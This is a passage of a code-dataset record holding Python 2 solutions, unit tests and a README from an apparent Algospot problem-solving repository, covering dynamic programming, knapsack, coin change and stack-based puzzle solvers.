print \"Yes\"\n else:\n print \"No\"\n" }, { "alpha_fraction": 0.39605462551116943, "alphanum_fraction": 0.41729894280433655, "avg_line_length": 26.45833396911621, "blob_id": "fa98f2b259f3f84bf8cea7ebcf099a19cdf9ec81", "content_id": "348e719ce0ec05fa39945e9c1a8c33a956f679bc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 659, "license_type": "no_license", "max_line_length": 48, "num_lines": 24, "path": "/DIAMONDPATH/DIAMONDPATH.py", "repo_name": 
"free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\n\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline()\n for _ in xrange(int(rl())):\n n = int(rl())\n ret = [0]*n\n ret[0] = int(rl())\n\n for i in xrange(n-1):\n input = map(int, rl().split())\n input[0] += ret[0]\n input[-1] += ret[len(input)-2]\n for j in xrange(1, len(input)-1):\n input[j] += max(ret[j-1],ret[j])\n ret = input\n\n for i in xrange(n,1,-1):\n input = map(int, rl().split())\n for j in xrange(len(input)):\n input[j] += max(ret[j],ret[j+1])\n ret = input\n\n print ret[0]\n" }, { "alpha_fraction": 0.36026936769485474, "alphanum_fraction": 0.4511784613132477, "avg_line_length": 20.214284896850586, "blob_id": "d3c4c318d1b937f60df5fa9d456b011017a91fd0", "content_id": "6b8099b9e1d0eab3dcd042827a251c919bcbba36", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 297, "license_type": "no_license", "max_line_length": 52, "num_lines": 14, "path": "/BALLPAINTING/BALLPAINTING.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\n\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline()\n case = [0]*1001\n case[1] = 2\n for i in xrange(2, 1001):\n case[i] = (case[i-1]*4*(2*i-1)) % 1000000007\n\n while(True):\n n = int(rl())\n if n == 0:\n break\n print(case[n])\n" }, { "alpha_fraction": 0.4215456545352936, "alphanum_fraction": 0.44184231758117676, "avg_line_length": 25.6875, "blob_id": "fd6462c6fd853de44b0f621d698490583033d5da", "content_id": "ee1dcddee293f145e4adca2b6b60afa06ec41c82", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1281, "license_type": "no_license", "max_line_length": 58, "num_lines": 48, "path": "/DECODE/DECODE.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\n\ndef solve(r, c, s):\n pos = 0\n str_list = []\n direction = 0\n dir_list = [1, c,-1, -c]\n\n for i in xrange(r*c/5):\n one_char = 0\n for j in xrange(4,-1,-1):\n if s[pos] == \"1\":\n one_char += (1<<j)\n s[pos] = -1\n pos += dir_list[direction]\n need_change_dir = False\n\n # Case : Visit string at matrix outside\n if direction == 0 and pos == c:\n need_change_dir = True\n elif direction == 1 and pos == len(s)-1+c:\n need_change_dir = True\n # Case : Visit already visted string\n elif s[pos] == -1:\n need_change_dir = True\n\n if need_change_dir:\n pos -= dir_list[direction]\n direction = (direction+1)%4\n pos += dir_list[direction]\n\n str_list.append(one_char)\n\n ret = \"\"\n for c in str_list:\n if c == 0:\n ret += \" \"\n else:\n ret += chr(64+c)\n\n return ret\n\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline().rstrip(' \\t\\r\\n\\0')\n for i in xrange(int(rl())):\n input = rl().split()\n r, c = int(input[0]), int(input[1])\n print i+1, solve(r, c, list(input[2]))\n" }, { "alpha_fraction": 0.49368420243263245, "alphanum_fraction": 0.5442105531692505, "avg_line_length": 27.787878036499023, "blob_id": "454ade967ff12f7f0a79c8f0863cb8beefcfb85f", "content_id": "c7f0e016a5d1d3325bb249c94b86b76310bd4157", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 950, "license_type": "no_license", "max_line_length": 53, "num_lines": 33, "path": "/HANOI4/HANOI4_Unittest.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "test = __import__('HANOI4_Bit')\nimport unittest\nimport random\n\nclass 
Test_HANOI4(unittest.TestCase):\n    def test_exam1(self):\n        num = 5\n        state = test.set_list(0, [1],0)\n        state = test.set_list(state, [3],1)\n        state = test.set_list(state, [5,4],2)\n        state = test.set_list(state, [2],3)\n        self.assertEqual(test.solve(num, state), 10)\n\n    def test_exam2(self):\n        num = 3\n        state = test.set_list(0, [2],0)\n        state = test.set_list(state, [3,1],2)\n        self.assertEqual(test.solve(num, state), 4)\n\n    def test_exam3(self):\n        num = 10\n        state = test.set_list(0, [8,7],0)\n        state = test.set_list(state, [5,4],1)\n        state = test.set_list(state, [6,3,2],2)\n        state = test.set_list(state, [10,9,1],3)\n        for _ in xrange(50):\n            test.solve(num, state)\n        self.assertEqual(test.solve(num, state), 24)\n\n\n\nif __name__ == \"__main__\":\n    unittest.main()\n" }, { "alpha_fraction": 0.4479704797267914, "alphanum_fraction": 0.4723247289657593, "avg_line_length": 23.196428298950195, "blob_id": "81ea9e782c63ff4065b5c9270ba26787530a6b06", "content_id": "25e89e393385dfc8dca562e7d361648b2a73d217", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1355, "license_type": "no_license", "max_line_length": 70, "num_lines": 56, "path": "/PACKING/PACKING.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\n\nN, W = None, None\nitems = None\ncache = None\n\ndef solve(n, capacity):\n    if cache[n][capacity] != -1:\n        return cache[n][capacity]\n\n    if n == N:\n        return 0\n\n    ret = -1\n    if capacity >= items[n][1]:\n        ret = solve(n+1, capacity - items[n][1]) + items[n][2]\n\n    ret = max(ret, solve(n+1, capacity))\n    cache[n][capacity] = ret\n    return ret\n\ndef reconstruct(n, capa, choose):\n    if n == N:\n        return\n\n    if solve(n, capa) == solve(n+1, capa) :\n        reconstruct(n+1, capa, choose)\n    else:\n        choose.append(items[n][0])\n        reconstruct(n+1, capa-items[n][1],choose)\n\nif __name__ == \"__main__\":\n    rl = lambda : sys.stdin.readline()\n    for _ in xrange(int(rl())):\n        N, W = map(int, rl().split())\n        items = [None]*N\n        cache = [[-1]*1001 for _ in xrange(101)]\n        for j in xrange(N):\n            i = rl().split()\n            items[j] = [i[0], int(i[1]), int(i[2])]\n\n        needs = solve(0, W)\n        choose = []\n        n = 0\n        w = W\n        for i in xrange(N):\n            if cache[i][w] - items[i][2] == cache[i+1][w-items[i][1]]:\n                choose.append(items[i][0])\n                n += 1\n                w -= items[i][1]\n\n        choose = []\n        reconstruct(0, W, choose)\n        print needs, len(choose)\n        for name in choose:\n            print name\n" }, { "alpha_fraction": 0.7324324250221252, "alphanum_fraction": 0.7351351380348206, "avg_line_length": 51.85714340209961, "blob_id": "907cd7a367dec064cd9181db09341eea3b942135", "content_id": "418d1b18d3d3525bbaf940a9b874b1743643521e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 838, "license_type": "no_license", "max_line_length": 84, "num_lines": 14, "path": "/README.md", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "# Algospot solution Repository\n\n- Mismatched Brackets (BRACKETS2) [[link](https://algospot.com/judge/problem/read/BRACKETS2)]\n- Canada Trip (CANADATRIP) [[link](https://algospot.com/judge/problem/read/CANADATRIP)]\n- Alien Signal Analysis (ITES) [[link](https://algospot.com/judge/problem/read/ITES)]\n- Josephus Problem (JOSEPHUS)\n[[link](https://algospot.com/judge/problem/read/JJOSEPHUS)]\n- Heating Lunchboxes (LUNCHBOX) [[link](https://algospot.com/judge/problem/read/LUNCHBOX)]\n- LIS (LIS) [[link](https://algospot.com/judge/problem/read/JLIS)]\n- Maximum Path on a Triangle (TRIANGLEPATH)
[[link](https://algospot.com/judge/problem/read/TRIANGLEPATH)]\n- Wildcard (WILDCARD) [[link](https://algospot.com/judge/problem/read/WILDCARD)]\n- One-legged Jumping (JUMPGAME)\n[[link](https://algospot.com/judge/problem/read/JUMPGAME)]\n" }, { "alpha_fraction": 0.45945945382118225, "alphanum_fraction": 0.4628378450870514, "avg_line_length": 25.909090042114258, "blob_id": "87cc609db4dad3427bc538ee1778c9366cc3808f", "content_id": "6e7013effb8d38c07c5e9c80194e42f0af326ef0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 296, "license_type": "no_license", "max_line_length": 58, "num_lines": 11, "path": "/HOTSUMMER/HOTSUMMER.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\n\nif __name__ == \"__main__\":\n    rl = lambda : sys.stdin.readline().rstrip(' \\t\\r\\n\\0')\n    for _ in xrange(int(rl())):\n        target = int(rl())\n        elec_sum = sum(map(int, rl().split()))\n        if elec_sum <= target:\n            print 'YES'\n        else:\n            print 'NO'\n" }, { "alpha_fraction": 0.3888888955116272, "alphanum_fraction": 0.4188034236431122, "avg_line_length": 20.9375, "blob_id": "f9d1eb8bfb88bca4bd27e416cdaa42c94cb9baf7", "content_id": "d2da1529ebee244aca7b26fc0efacc85f307bbb9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 702, "license_type": "no_license", "max_line_length": 46, "num_lines": 32, "path": "/CONCERT/CONCERT.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\nN = None\nVS = None\nVM = None\nVN = None\ncache = None\n\ndef solve():\n    cache[0][VS] = 1\n    for i in xrange(N):\n        for j in xrange(VM+1):\n            if cache[i][j] == 1:\n                if 0 <= j + VN[i] <= VM:\n                    cache[i+1][j+VN[i]] = 1\n\n                if 0 <= j - VN[i] <= VM:\n                    cache[i+1][j-VN[i]] = 1\n\n    for i in xrange(VM,-1,-1):\n        if cache[N][i] == 1:\n            return i\n\n    return -1\n\nif __name__ == \"__main__\":\n    rl = lambda : sys.stdin.readline()\n    for _ in xrange(int(rl())):\n        N, VS, VM = map(int, rl().split())\n        VN = map(int, rl().split())\n        cache = [[0]*1001 for _ in xrange(51)]\n\n        print solve()\n" }, { "alpha_fraction": 0.408629447221756, "alphanum_fraction": 0.4796954393386841, "avg_line_length": 27.14285659790039, "blob_id": "ca8736641c8bd6255766274b20c6697e0c3d6f94", "content_id": "f241241b2eaf4cf0d8d885d42dea590d79216f5d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 394, "license_type": "no_license", "max_line_length": 76, "num_lines": 14, "path": "/CONVERT/CONVERT.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\n\nd = dict()\nd['kg'] = (2.2046, 'lb')\nd['lb'] = (0.4536, 'kg')\nd['l'] = (0.2642, 'g')\nd['g'] = (3.7854, 'l')\n\nif __name__ == \"__main__\":\n    rl = lambda: sys.stdin.readline().rstrip(' \\t\\r\\n\\0')\n    for i in xrange(int(rl())):\n        input = rl().split()\n        digits, unit = float(input[0]), input[1]\n        print i+1, \"{:.4f}\".format(round(digits * d[unit][0],4)), d[unit][1]\n" }, { "alpha_fraction": 0.4396226406097412, "alphanum_fraction": 0.4716981053352356, "avg_line_length": 26.5, "blob_id": "780c155840e92cb6eb09d3cf0155ffb082d6bf97", "content_id": "1b7789e629b3a7b7ee1e907fd45326328e391804", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 530, "license_type": "no_license", "max_line_length": 58, "num_lines": 20, "path": "/COINS/COINS.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": 
"import sys\n\ndef solve(m, c, coins):\n cache = [0]*(m+1)\n\n for i, v in enumerate(coins):\n if v > m:\n break\n cache[v] += 1\n for j in xrange(coins[0],m-v+1):\n if cache[j] > 0:\n cache[j+v] += cache[j]\n return cache[m]\n\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline().rstrip(' \\t\\r\\n\\0')\n for _ in xrange(int(rl())):\n m, c = map(int, rl().split())\n coins = sorted(map(int, rl().split()))\n print solve(m, c, coins) % 1000000007\n" }, { "alpha_fraction": 0.3986850082874298, "alphanum_fraction": 0.4136282205581665, "avg_line_length": 36.17777633666992, "blob_id": "a3b7d0c921294c9bbf4e57ac0f2eda72839d7e13", "content_id": "06e2d06ffee0e95d8eea51b3ab8b751cd6c38cc0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1673, "license_type": "no_license", "max_line_length": 81, "num_lines": 45, "path": "/MAGICPOWER/MAGICPOWER.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\nfrom collections import Counter\n\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline().rstrip(' \\t\\r\\n\\0')\n for _ in xrange(int(rl())):\n N, M = map(int, rl().split())\n\n items = Counter(map(int, rl().split()))\n index = list(sorted(items))\n ret = 0\n\n while M > 0:\n # Case : Remain only same value items (Rectangle graph)\n if len(index) == 1:\n if M > items[index[0]]*index[0]:\n ret += sum(range(index[0]+1))*items[index[0]]\n else:\n x,y = divmod(M, items[index[0]])\n ret += sum(range(index[0]-x+1, index[0]+1))*items[index[0]]\n ret += (index[0]-x) * y\n break\n \n # Case : Stepped graph\n # e.g) below shape\n # -\n # ----\n # ---\n else:\n n = len(index)-1\n # Calculate a highest value rectangle and then continue this work\n if M > items[index[n]]*(index[n]-index[n-1]):\n ret += sum(range(index[n-1]+1, index[n]+1))*(items[index[n]])\n M -= items[index[n]]*(index[n]-index[n-1])\n items[index[n-1]] += items[index[n]]\n del items[index[n]]\n del index[n]\n # Calculate remain M and then finish\n else:\n x,y = divmod(M, items[index[n]])\n ret += sum(range(index[n]-x+1, index[n]+1))*items[index[n]]\n ret += (index[n]-x) * y\n break\n\n print ret\n" }, { "alpha_fraction": 0.47130435705184937, "alphanum_fraction": 0.4886956512928009, "avg_line_length": 25.136363983154297, "blob_id": "94a0dff9591169304375060cc198feea11a39783", "content_id": "1805f55f2d1725bf1827d3c6b3bf7188b14d1c53", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 575, "license_type": "no_license", "max_line_length": 63, "num_lines": 22, "path": "/FENCE/FENCE.py", "repo_name": "free-lunch/algospot-solving", "src_encoding": "UTF-8", "text": "import sys\n\ndef solve(fences):\n stack = []\n ret = 0\n # stack = [(idx, value)]\n for cur, v in enumerate(fences):\n new_idx = cur\n while stack and stack[-1][1] >= v:\n ret = max(ret, stack[-1][1] * (cur - stack[-1][0]))\n new_idx = stack.pop()[0]\n stack.append((new_idx, v))\n\n return ret\n\nif __name__ == \"__main__\":\n rl = lambda : sys.stdin.readline().rstrip(' \\t\\r\\n\\0')\n for _ in xrange(int(rl())):\n n = int(rl())\n fences = map(int, rl().split())\n fences.append(0)\n print solve(fences)\n" } ]
55
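One pattern worth calling out from the 55 files in the record above is the "binary search on the answer" used by NECKLACE.py: instead of bisecting an index, it bisects the answer value itself, relying on a monotone feasibility test (`determine`). What follows is a minimal, self-contained Python 3 sketch of that pattern; the `max_feasible` helper and the demo data are illustrative stand-ins, not code from the repository.

```python
# Minimal sketch of "binary search on the answer".
# `feasible` is assumed monotone: if a value is feasible, every smaller
# value is too, so the largest feasible value can be bisected.

def max_feasible(lo, hi, feasible):
    """Largest v in [lo, hi) with feasible(v); assumes feasible(lo) holds."""
    while lo + 1 < hi:            # invariant: feasible(lo) and not feasible(hi)
        mid = (lo + hi) // 2
        if feasible(mid):
            lo = mid
        else:
            hi = mid
    return lo

# Example: longest necklace length n friends can each be given, from bead counts.
def demo():
    n, counts = 3, [5, 5, 5]

    def feasible(length):
        # Each color contributes at most `length` beads to any one necklace.
        return sum(min(c, length) for c in counts) >= length * n

    # hi is one past any possible answer, mirroring NECKLACE.py's sum(...) + 1.
    print(max_feasible(0, sum(counts) + 1, feasible))  # -> 5

if __name__ == "__main__":
    demo()
```

The `while min_bound + 1 < max_bound` loop in NECKLACE.py maintains the same invariant: the lower bound always satisfies the test, the upper bound never does.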
RoyElkabetz/Quine
https://github.com/RoyElkabetz/Quine
ec29918cee7bcfc312d025457c49cf7c57a07c39
c5d9c239f11c4bd9064c7eaf6487506a89f5b0bf
d5bc55d8e1b822e140af316bcb60d87ff37de02b
refs/heads/main
2023-08-22T05:38:52.005451
2021-09-27T13:39:34
2021-09-27T13:39:34
410,897,722
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.4931972920894623, "alphanum_fraction": 0.5034013390541077, "avg_line_length": 13.292682647705078, "blob_id": "0443d0474534bbd085b8a3996234a8c7d46d6a03", "content_id": "a0de31f697283235640afae257f5856aef8f8d48", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 588, "license_type": "no_license", "max_line_length": 52, "num_lines": 41, "path": "/README.md", "repo_name": "RoyElkabetz/Quine", "src_encoding": "UTF-8", "text": "# Quine\n\n[pyquine](pyquine.py) is a Quine written in Python. \n```python\n# This is a python quine\n# the variables\nq = chr(39)\nidx = 8\n \n \n# the string list\na = [\n'# This is a python quine',\n'# the variables',\n'q = chr(39)',\n'idx = 8',\n' ',\n' ',\n'# the string list',\n'a = [',\n']',\n' ',\n' ',\n'# the print',\n'for i in range(idx):',\n' print(a[i])',\n'for s in a:',\n' print(q + s + q + \",\")',\n'for i in range(idx, len(a)):',\n' print(a[i])',\n]\n \n \n# the print\nfor i in range(idx):\n print(a[i])\nfor s in a:\n print(q + s + q + \",\")\nfor i in range(idx, len(a)):\n print(a[i])\n```\n \n" }, { "alpha_fraction": 0.4715127646923065, "alphanum_fraction": 0.4833005964756012, "avg_line_length": 13.166666984558105, "blob_id": "3bdf96be73f153252ea0be2cd3ae70a72776d093", "content_id": "55448557e01e2ae4e43facaaf100382f6129e262", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 509, "license_type": "no_license", "max_line_length": 31, "num_lines": 36, "path": "/pyquine.py", "repo_name": "RoyElkabetz/Quine", "src_encoding": "UTF-8", "text": "# This is a python quine\n# the variables\nq = chr(39)\nidx = 8\n \n \n# the string list\na = [\n'# This is a python quine',\n'# the variables',\n'q = chr(39)',\n'idx = 8',\n' ',\n' ',\n'# the string list',\n'a = [',\n']',\n' ',\n' ',\n'# the print',\n'for i in range(idx):',\n' print(a[i])',\n'for s in a:',\n' print(q + s + q + \",\")',\n'for i in range(idx, len(a)):',\n' print(a[i])',\n]\n \n \n# the print\nfor i in range(idx):\n print(a[i])\nfor s in a:\n print(q + s + q + \",\")\nfor i in range(idx, len(a)):\n print(a[i])" } ]
2
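pyquine.py in the Quine record above reproduces itself by storing an explicit list of its own source lines and using chr(39) to obtain the quote character without typing it inside a quoted string. For contrast, here is a minimal sketch of the classic repr-based Python quine (not part of this repository), which reaches the same fixed point in two lines:

```python
# %r substitutes repr(s), quotes and backslash-escapes included, so the
# printed text regenerates this source exactly; %% prints a literal %.
s = 's = %r\nprint(s %% s)'
print(s % s)
```

Where the listed quine prints its line list twice, once as code and once as quoted data, the repr trick lets Python's own string escaping perform that second pass.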
dream-stream/PlayGround
https://github.com/dream-stream/PlayGround
6f5c009122026c1e67d60ee0f5da72c9f305f7a6
adf9760d6448d6571ef0e33eb86303c1b1ef7e98
9ca5145876da19abdcbbab2f52c02a0de78c4608
refs/heads/master
2020-07-12T18:34:05.965379
2019-12-30T14:39:58
2019-12-30T14:39:58
204,881,784
0
0
null
2019-08-28T08:14:46
2019-12-30T14:40:07
2020-01-31T18:05:33
C#
[ { "alpha_fraction": 0.6485148668289185, "alphanum_fraction": 0.6485148668289185, "avg_line_length": 19.200000762939453, "blob_id": "ca0b5cf3e9f3b35e85b0832429861288a2f042bd", "content_id": "4fa81f5454e09ba9c890425d451fc3092531d121", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 204, "license_type": "no_license", "max_line_length": 41, "num_lines": 10, "path": "/Deprecated Dream-Stream/Dream-Stream/Serialization/ISerializer.cs", "repo_name": "dream-stream/PlayGround", "src_encoding": "UTF-8", "text": "using Dream_Stream.Models.Messages;\n\nnamespace Dream_Stream.Serialization\n{\n public interface ISerializer\n {\n byte[] Serialize<T>(T obj);\n T Deserialize<T>(byte[] message);\n }\n}\n" }, { "alpha_fraction": 0.4929041266441345, "alphanum_fraction": 0.5008653402328491, "avg_line_length": 30.07526969909668, "blob_id": "5d215eb23426a0b952a4be27246166ce7fd09b70", "content_id": "b16b7e2bb2fabe603eafa0ff12e9a2f8559da4c0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 2891, "license_type": "no_license", "max_line_length": 100, "num_lines": 93, "path": "/NatsStreaming/dotnet/Consumer/Consumer/Program.cs", "repo_name": "dream-stream/PlayGround", "src_encoding": "UTF-8", "text": "using System;\nusing System.Diagnostics;\nusing System.Threading;\nusing STAN.Client;\n\nnamespace Consumer\n{\n internal class StanSubscriber\n {\n StanSubscriptionOptions _sOpts = StanSubscriptionOptions.GetDefaultOptions();\n\n private const int Count = 10000;\n private string _clientId = \"cs-subscriber\";\n private const string ClusterId = \"nats-streaming\";\n private const string Subject = \"foo\";\n private const string Url = \"nats://nats-cluster:4222\";\n private const bool Verbose = false;\n private int _received = 0;\n\n public void Run(string[] args)\n {\n _clientId += Guid.NewGuid();\n Banner();\n\n var opts = StanOptions.GetDefaultOptions();\n opts.NatsURL = Url;\n\n using var c = new StanConnectionFactory().CreateConnection(ClusterId, _clientId, opts);\n while (true)\n {\n _received = 0;\n var elapsed = ReceiveAsyncSubscriber(c);\n Console.Write(\"Received {0} msgs in {1} seconds \", _received, elapsed.TotalSeconds);\n Console.WriteLine(\"({0} msgs/second).\", (int)(_received / elapsed.TotalSeconds));\n }\n }\n\n private TimeSpan ReceiveAsyncSubscriber(IStanConnection c)\n {\n var sw = new Stopwatch();\n var ev = new AutoResetEvent(false);\n\n EventHandler<StanMsgHandlerArgs> msgHandler = (sender, args) =>\n {\n if (_received == 0)\n sw.Start();\n\n _received++;\n\n if (Verbose)\n {\n Console.WriteLine(\"Received seq # {0}: {1}\",\n args.Message.Sequence,\n System.Text.Encoding.UTF8.GetString(args.Message.Data));\n }\n\n if (_received >= Count)\n {\n sw.Stop();\n ev.Set();\n }\n };\n\n using (var s = c.Subscribe(Subject, _sOpts, msgHandler))\n {\n ev.WaitOne();\n }\n\n return sw.Elapsed;\n }\n\n private void Banner()\n {\n Console.WriteLine(\"Connecting to cluster '{0}' as client '{1}'.\", ClusterId, _clientId);\n Console.WriteLine(\"Consuming {0} messages on subject {1}\", Count, Subject);\n Console.WriteLine(\" Url: {0}\", Url);\n }\n\n public static void Main(string[] args)\n {\n try\n {\n new StanSubscriber().Run(args);\n }\n catch (Exception ex)\n {\n Console.Error.WriteLine(\"Exception: \" + ex.Message);\n if (ex.InnerException != null)\n Console.Error.WriteLine(\"Inner Exception: \" + ex.InnerException.Message);\n }\n }\n }\n}" }, { "alpha_fraction": 0.7330861687660217, 
"alphanum_fraction": 0.7562558054924011, "avg_line_length": 33.900001525878906, "blob_id": "31a78a420cc5d21e9504dda9a3022c0122c19602", "content_id": "44892f20a86b435a057da4937c2afe2626682960", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1081, "license_type": "no_license", "max_line_length": 141, "num_lines": 30, "path": "/Nats/Python/README.md", "repo_name": "dream-stream/PlayGround", "src_encoding": "UTF-8", "text": "# NATS Python scripts\r\nNATS Python scripts contain an implementation of a Producer and Consumer.\r\n\r\nThe producer will publish three messages to the NATS server and the consumer will receive these three messages and write them in the console.\r\n\r\n## How to execute\r\nThis will be a step by step explanation on how to execute the scripts to see the described functionality.\r\n\r\n### Prerequirements\r\nBefore executing the scripts the following tools are required:\r\n- Python - 3.7.4\r\n- pip - 19.2.2\r\n- Docker - version 19.03.1, build 74b1e89\r\n\r\nThe version is the version installed on the computer where the scripts has been tested.\r\n\r\n### Step by step\r\nInstall the NATS docker image by running the following command:\r\n`docker run -d -p 4222:4222 nats`\r\n\r\nInstall the library for python:\r\n`pip install asyncio-nats-client`\r\n\r\nRun the Consumer.py by the following command:\r\n`python Consumer.py`\\\r\nThe Consumer will write to the console when it is ready to receive messages.\\\r\nTo stop the application again press 'enter'.\r\n\r\nRun the Producer in another terminal:\r\n`python Producer.py`\r\n\r\n" }, { "alpha_fraction": 0.6296296119689941, "alphanum_fraction": 0.6419752836227417, "avg_line_length": 14.428571701049805, "blob_id": "dc9751d0f6e87107483f4beb7eb32297d07c1cb8", "content_id": "02cc2df2fe5159552a8d2213207f66fef22bd7ae", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 324, "license_type": "no_license", "max_line_length": 47, "num_lines": 21, "path": "/Nats/Go/Publisher/Publisher.go", "repo_name": "dream-stream/PlayGround", "src_encoding": "UTF-8", "text": "package main\n\nimport (\n\t\"fmt\"\n\n\tnats \"github.com/nats-io/nats.go\"\n)\n\nfunc main() {\n\t// Connect to a server\n\tnc, _ := nats.Connect(\"localhost:4222\")\n\n\t// Simple Publisher\n\tfmt.Println(\"Publishing message: Hello World\")\n\t// Uncommented for message spam\n\t// for {\n\tnc.Publish(\"foo\", []byte(\"Hello World\"))\n\t// }\n\n\tnc.Close()\n}\n" }, { "alpha_fraction": 0.6608695387840271, "alphanum_fraction": 0.678260862827301, "avg_line_length": 23.64285659790039, "blob_id": "eaaa7c5a0307e951fa3bc44667280bff73461eeb", "content_id": "1010952002290213755248484b5f1211e7f95d0d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 347, "license_type": "no_license", "max_line_length": 44, "num_lines": 14, "path": "/Deprecated Dream-Stream/Dream-Stream/Models/Messages/IMessage.cs", "repo_name": "dream-stream/PlayGround", "src_encoding": "UTF-8", "text": "using MessagePack;\n\nnamespace Dream_Stream.Models.Messages\n{\n [Union(0, typeof(MessageContainer))]\n [Union(1, typeof(SubscriptionResponse))]\n [Union(2, typeof(SubscriptionRequest))]\n [Union(3, typeof(Message))]\n [Union(4, typeof(MessageHeader))]\n [Union(5, typeof(MessageRequest))]\n public interface IMessage\n {\n }\n}\n" }, { "alpha_fraction": 0.6064425706863403, "alphanum_fraction": 0.6162465214729309, "avg_line_length": 15.227272987365723, 
"blob_id": "ac4be9fd5eed10078493f332a303eafe175d7b09", "content_id": "dffeeadd463b9f15757f6c7b04270b9413d548d1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Go", "length_bytes": 714, "license_type": "no_license", "max_line_length": 69, "num_lines": 44, "path": "/Nats/Go/Consumer/Consumer.go", "repo_name": "dream-stream/PlayGround", "src_encoding": "UTF-8", "text": "package main\n\nimport (\n\t\"fmt\"\n\t\"time\"\n\n\t\"github.com/eiannone/keyboard\"\n\t\"github.com/nats-io/nats.go\"\n)\n\nfunc main() {\n\tnc, _ := nats.Connect(\"localhost:4222\")\n\n\terr := keyboard.Open()\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tdefer keyboard.Close()\n\tcount := 0\n\t// Simple Async Subscriber\n\tsub, err := nc.Subscribe(\"foo\", func(m *nats.Msg) {\n\t\tcount++\n\t\tfmt.Printf(\"Received a message: %s %d\\n\", string(m.Data), count)\n\t})\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\tfor {\n\t\ttime.Sleep(50 * time.Millisecond)\n\n\t\t_, key, err := keyboard.GetKey()\n\t\tif err != nil {\n\t\t\tpanic(err)\n\t\t} else if key == keyboard.KeyEnter {\n\t\t\tbreak\n\t\t}\n\t}\n\n\t// Drain - unsubscribes from a topic when there are no more messages\n\tsub.Drain()\n\n\tnc.Close()\n}\n" }, { "alpha_fraction": 0.6164383292198181, "alphanum_fraction": 0.6255707740783691, "avg_line_length": 23.38888931274414, "blob_id": "f6ee727526b921dd29498660ea436ea1e9e72408", "content_id": "55df050218d0ab5b11a3a5b9055031fb132ae70b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 438, "license_type": "no_license", "max_line_length": 49, "num_lines": 18, "path": "/Nats/Python/Producer.py", "repo_name": "dream-stream/PlayGround", "src_encoding": "UTF-8", "text": "import asyncio\nfrom nats.aio.client import Client as NATS\n\nasync def run(loop):\n nc = NATS()\n\n await nc.connect(\"localhost:4222\", loop=loop)\n await nc.publish(\"foo\", b'Hello')\n await nc.publish(\"foo\", b'World')\n await nc.publish(\"foo\", b'!!!!!')\n\n # Terminate connection to NATS.\n await nc.close()\n\nif __name__ == '__main__':\n loop = asyncio.get_event_loop()\n loop.run_until_complete(run(loop))\n loop.close()" }, { "alpha_fraction": 0.5153294205665588, "alphanum_fraction": 0.5283757448196411, "avg_line_length": 35.5, "blob_id": "5b743663420c300002568398da99f55eb91364d0", "content_id": "6d1387ac0eef4c33b25315219aa4cbacf2bf4aba", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C#", "length_bytes": 1535, "license_type": "no_license", "max_line_length": 119, "num_lines": 42, "path": "/Kafka/dotnet/Producer/Producer/Program.cs", "repo_name": "dream-stream/PlayGround", "src_encoding": "UTF-8", "text": "using System;\nusing System.Collections.Generic;\nusing System.Threading.Tasks;\nusing Confluent.Kafka;\n\nnamespace Producer\n{\n class Program\n {\n public static async Task Main(string[] args)\n {\n Console.WriteLine(\"Starting Kafka Producer\");\n var list = new List<string>();\n for (var i = 0; i < 3; i++) list.Add($\"kf-kafka-{i}.kf-hs-kafka.default.svc.cluster.local:9093\");\n var bootstrapServers = string.Join(',', list);\n var config = new ProducerConfig { BootstrapServers = bootstrapServers };\n\n // If serializers are not specified, default serializers from\n // `Confluent.Kafka.Serializers` will be automatically used where\n // available. 
